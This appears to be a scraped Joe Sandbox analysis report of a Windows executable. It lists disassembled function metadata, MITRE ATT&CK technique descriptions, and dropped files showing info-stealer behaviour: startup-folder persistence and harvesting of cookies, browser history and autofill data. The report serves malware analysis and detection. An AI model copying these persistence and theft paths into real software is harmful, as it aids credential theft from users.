Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction ID: 73bf4f038d7fada361c17f894e43a8ad5c46043bea285f2555c6d9ff99caa31f
Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
Instruction Fuzzy Hash: 0941D263A18A85C6EB60DF25E4443A96760FF98BA0F404039EE4EC7798DF3CD841C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CF918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6850CF958
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6850CF9AA

Strings

:, xrefs: 00007FF6850CF96E

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
Instruction ID: 84766c581bc0901191c465a5668e8cb4e5c3fcc1fa4ccb4a80d06d4d53fe6076
Opcode Fuzzy Hash: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
Instruction Fuzzy Hash: 5E219E62A08681C2EF20DB15D04526D63A1FF85F98F558039DA8D8B385EF7CED45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B2B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

MessageBoxW.USER32 ref: 00007FF6850B2C05
MessageBoxA.USER32 ref: 00007FF6850B2C21

Strings

Fatal error detected, xrefs: 00007FF6850B2BDB, 00007FF6850B2C13

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Fatal error detected
API String ID: 1878133881-4025702859
Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction ID: 8bcc3eef16ae1d840f1e580e7e7d6354ed26fbad5866c32c8600f69fcc53d8c4
Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
Instruction Fuzzy Hash: 8D216572628686D2EB30DB10F4916EA7364FF84BD4F805139E68D87A65DF3CD605CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B2C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

MessageBoxW.USER32 ref: 00007FF6850B2D25
MessageBoxA.USER32 ref: 00007FF6850B2D41

Strings

Error detected, xrefs: 00007FF6850B2CFB, 00007FF6850B2D33

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error detected
API String ID: 1878133881-3513342764
Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction ID: 23706580ae9a1c4a10daa2af61cb180454fee24b579e9a299503de957c140bdc
Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
Instruction Fuzzy Hash: 59217772628A86D2EB30DB10F4916EA7364FF84BD4F805139E68D97A65DF3CD605CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BFE80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6850BFED0
RaiseException.KERNEL32 ref: 00007FF6850BFF11

Strings

csm, xrefs: 00007FF6850BFEFE

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction ID: 0a2fe0032ea565387050bd610f322e436d4bdadfdc26bff3b989cb16f9e65704
Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
Instruction Fuzzy Hash: 8E11F632618B4182EA618F15E480269B7A5FB88B94F585238DA9C87759DF3DD951CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D041C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D044C
GetDriveTypeW.KERNEL32 ref: 00007FF6850D048C

Strings

:, xrefs: 00007FF6850D0475

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction ID: 1fe3e62559b525011a7f023697341dd3841f96f77cdfc39b80c4db788d18ecc0
Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
Instruction Fuzzy Hash: 6101A26291C206C6FB60EF60947127E23A0FF85B29F90053DD94DC6691EF3CED44CA24

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exePID: 1240, Parent PID: 5060COMMON

Executed Functions

Function 0000021E4BD00FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000028.00000003.1378785654.0000021E4BD00000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021E4BD00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_21e4bd00000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: be6782d1810ff0d98531822258a2a21bc273ff3712061284ba630c2b8fd7762f
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 81900218C9640A65D82411A10C4969C54416398158FD548C1485690144D84D02962193

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9afaXJv52z.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D.zip

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Firefox\History.txt

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\network_info.txt

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\process_info.txt

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\system_info.txt

C:\Users\user\AppData\Local\Temp\AutofillData.db

C:\Users\user\AppData\Local\Temp\Cookies.db

Windows Analysis Report
9afaXJv52z.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre